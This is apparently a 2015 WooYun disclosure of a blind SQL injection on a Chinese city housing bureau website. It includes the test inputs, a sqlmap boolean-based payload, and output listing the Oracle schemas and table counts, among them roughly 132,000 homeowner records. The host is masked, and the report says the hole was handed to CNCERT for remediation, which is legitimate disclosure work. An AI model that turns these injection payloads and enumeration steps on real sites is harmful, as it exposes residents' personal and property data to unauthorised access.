当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160456

漏洞标题:平顶山房管局又一处SQL注入(十三万的房屋所有者信息)

相关厂商:平顶山房管局

漏洞作者: 默之

提交时间:2015-12-11 17:56

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-11: 细节已通知厂商并且等待厂商处理中
2015-12-15: 厂商已经确认,细节仅向厂商公开
2015-12-25: 细节向核心白帽子及相关领域专家公开
2016-01-04: 细节向普通白帽子公开
2016-01-14: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

太费时间了

详细说明:

http://**.**.**.**/public/ZJJGInfo.aspx?code=176021


and 1=1 返回正常,and 1=2.没有数据返回
存在注入

---
Place: GET
Parameter: code
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: code=176021 AND 1085=1085
---
[16:10:59] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle


共20个数据库,房管局的数据库还是有很多住房人的信息的,不过没有找出来,但是找到了大量的房屋信息

[*] apex_030200
[*] appqossys
[*] ctxsys
[*] dbsnmp
[*] exfsys
[*] flows_files
[*] mdsys
[*] olapsys
[*] orddata
[*] ordsys
[*] outln
[*] owbsys
[*] scott
[*] sys
[*] sysman
[*] system
[*] wmsys
[*] wsbalog
[*] wsbayt
[*] xdb


漏洞证明:

Database: ORDDATA
+--------------------------+---------+
| Table | Entries |
+--------------------------+---------+
| ORDDCM_DICT_ATTRS | 2418 |
| ORDDCM_STD_ATTRS | 2415 |
| ORDDCM_UID_DEFS | 245 |
| ORDDCM_CT_LOCATORPATHS | 95 |
| ORDDCM_CT_DAREFS | 72 |
| ORDDCM_CT_PRED | 61 |
| ORDDCM_CT_PRED_OPRD | 53 |
| ORDDCM_INTERNAL_TAGS | 42 |
| ORDDCM_ANON_ATTRS | 37 |
| ORDDCM_VR_DT_MAP | 32 |
| ORDDCM_PREFS_LOOKUP | 13 |
| ORDDCM_RT_PREF_PARAMS | 13 |
| ORDDCM_CT_PRED_SET | 9 |
| ORDDCM_DOCS | 9 |
| ORDDCM_INSTALL_DOCS | 9 |
| ORDDCM_DOC_TYPES | 8 |
| ORDDCM_CT_ACTION | 7 |
| ORDDCM_DOC_REFS | 7 |
| ORDDCM_ANON_ACTION_TYPES | 4 |
| ORDDCM_ANON_RULE_TYPES | 3 |
| ORDDCM_ANON_RULES | 3 |
| ORDDCM_CT_PRED_PAR | 3 |
| ORDDCM_PRV_ATTRS | 3 |
| ORDDCM_CT_MACRO_PAR | 2 |
| ORDDCM_CT_MACRO_DEP | 1 |
| ORDDCM_DATA_MODEL | 1 |
| ORDDCM_MAPPING_DOCS | 1 |
+--------------------------+---------+


大量的数据

Database: WSBAYT
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| WSBA_UPLOADFILE | 375023 |上传文件
| HPMS_ROOM | 138098 |
| NWRS_SPFOWNER | 132130 |商品房住户
| LINK_YSSQ_ROOM | 129938 |
| LINK_ROOM_CERT | 118348 |
| NWRS_SELLBARGAIN_HTBA | 82154 |
| LINK_BARGAIN_ROOM | 75091 |
| LINK_MSG_RECEIVER | 74353 |
| NWRS_SELLBARGAIN | 73173 |
| PUBLIC_VISITOR | 54272 |
| DK_HPMS_ROOM | 34552 |
| TEST1 | 32126 |
| TEST2 | 30187 |
| SFSS_EXCHANGEMES | 23800 |
| SWRS_CQ_OWNER | 22963 |
| HPMS_YSSQDOCUMENT | 21845 |
| SFSS_OBJECTION | 21768 |
| LINK_YSSQDOC_FILE | 20688 |
| SWRS_LINK_BARGAIN_ROOM | 19635 |
| SWRS_SELLBARGAIN_HTBA | 19629 |
| SWRS_SELLBARGAIN | 19557 |
| SWRS_CQ_ROOM | 19429 |
| SWRS_WTBARGAIN | 19369 |
| SWRS_ISSUE | 19289 |
| SWRS_CQ_PROPERTY | 19173 |
| SFSS_JGSQ | 15486 |
| SFSS_ACCOUNT | 15383 |
| SFSS_SUPERVISEBARGAIN | 15383 |
| NWRS_BGSQ | 14333 |
| SFSS_DEPOSIT | 12746 |
| WSBA_MESSAGE | 12590 |
| LINK_BUILD_CERT | 12200 |
| SFSS_DRAW | 10685 |
| XTSZ_DAYSERIAL | 5589 |
| SYS_IMPORT_FULL_01 | 4201 |
| BAK_LINK_ROOM_CERT | 2802 |
| DK_BUILD_UNIT | 2228 |
| NWRS_TFSQ | 1907 |
| SPF_AJBADJSQB | 1905 |
| HPMS_BUILD | 1730 |
| BAK_ROOM_VFWID | 1532 |
| BAK_NWRS_SELLBARGAIN | 1498 |
| LINK_OLDFWZTSQ_ROOMCODE | 1484 |
| SWRS_TFSQ | 1468 |
| DK_HTBG_REL | 1365 |
| HPMS_YSSQ | 1260 |
| HPMS_YSXKZ | 1240 |
| SFSS_TOTALACCOUNT | 1215 |
| LINK_ROOM_CERT_DEL | 1004 |
| NWRS_SELLBARGAINMB | 742 |
| LINK_XSRY_PROJECT | 564 |
| XTSZ_USER | 554 |
| HPMS_JSGCGHXKZ | 552 |
| HPMS_JZGCSGXKZ | 548 |
| HEMS_PERSON | 536 |
| XTSZ_MKQX | 514 |
| HPMS_JSYDGHXKZ | 511 |
| HPMS_TDSYQZ | 493 |
| XTSZ_CODEB | 423 |
| HPMS_PROJECT | 372 |
| SFSS_BGSQ | 337 |
| SFSS_CXSQ | 325 |
| HEMS_COMPANY | 304 |
| XTSZ_MK | 251 |
| DK_HEMS_PERSON | 239 |
| HPMS_OLD_BAZXSQ | 235 |
| TMP_FWID_OFWID | 159 |
| HPMS_OLD_LPDR_FW | 140 |
| DK_BUILD_PROJECTCODEIS0 | 108 |
| HPMS_OLD_LPDR_OFW | 97 |
| SWRS_LEASEBARGAIN | 96 |
| HPMS_OLD_LPDR | 83 |
| HPMS_GCXXJD | 82 |
| DK_HEMS_COMPANY | 78 |
| HEMS_QYXXBGSQ | 74 |
| XTSZ_CBC | 73 |
| XTSZ_MKFL | 68 |
| HPMS_BUILDTABLE_CACHE | 61 |
| HPMS_OLD_ZJZXSQ | 53 |
| XTSZ_UCCOMPANY | 52 |
| HPMS_OLD_CFSQ | 51 |
| NFSS_SPECIALXKZ | 48 |
| NFSS_SPECIALXKZLOG | 48 |
| XTSZ_UCPERSON | 45 |
| NWRS_BOOKBARGAIN | 35 |
| XTSZ_FORMINFO | 34 |
| HPMS_OLD_AJZXSQ | 33 |
| IMP_OLDBUILDS | 31 |
| XTSZ_FIELDCONFIG | 31 |
| XTSZ_SYSROLCACHE | 31 |
| DOFF_ACCOUNTLINKMETHOD | 29 |
| HPMS_OLD_XZSQ | 29 |
| HPMS_OLD_CFZXSQ | 28 |
| HPMS_YSSQZL_TEMPLATE | 17 |
| HPMS_XMDHXX | 16 |
| XTSZ_ROLE | 14 |
| XTSZ_SERIALCONFIG | 14 |
| NWRS_BARGAIN_TEMPLATE | 12 |
| XTSZ_COMPANY_NOPUB | 10 |
| YW_CODEB | 9 |
| XTSZ_SYSTEM | 8 |
| HPMS_YSXKZ_DEL | 7 |
| XTSZ_QUERYCODE | 7 |
| XTSZ_KEYLOG | 5 |
| XTSZ_TREECACHE | 5 |
| XTSZ_UCCONFIGTREEINFO | 5 |
| XTSZ_YEARSERIAL | 5 |
| DOFF_ACCOUNT | 4 |
| LINK_KFQYDLS_LICENCE | 3 |
| NWRS_SBSUPPLY | 3 |
| HPMS_YSXKZ_YSJGZH | 2 |
| LINK_JGSQ_YSJGZH | 2 |
| NFSS_BANKNET | 2 |
| NFSS_JGSQ | 2 |
| SFSS_INTERESTRATE | 2 |
| XTSZ_ENTERMODULE | 2 |
| LINK_PROJECT_SPECIALKQY | 1 |
| PUBLIC_BACKINFO | 1 |
| SWRS_LEASEBARGAINHTBA | 1 |
| YW_CBC | 1 |
+-------------------------+---------+


Database: CTXSYS
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| DR$OBJECT_ATTRIBUTE | 512 |
| DR$DBO | 362 |
| DR$NUMBER_SEQUENCE | 256 |
| DR$OBJECT_ATTRIBUTE_LOV | 168 |
| DR$INDEX_VALUE | 86 |
| DR$STOPWORD | 76 |
| DR$OBJECT | 53 |
| DR$INDEX_OBJECT | 36 |
| DR$PARAMETER | 33 |
| DR$PREFERENCE | 30 |
| DR$PREFERENCE_VALUE | 20 |
| DR$FEATURE_USED | 17 |
| DR$CLASS | 13 |
| DR$SECTION_GROUP | 5 |
| DR$INDEX | 4 |
| DR$STOPLIST | 3 |
| DR$INDEX_SET | 1 |
+-------------------------+---------+

修复方案:

这个网站注入比较多,建议线下测试好了更换新系统

版权声明:转载请注明来源 默之@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-12-15 15:00

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给河南分中心,由河南分中心后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评价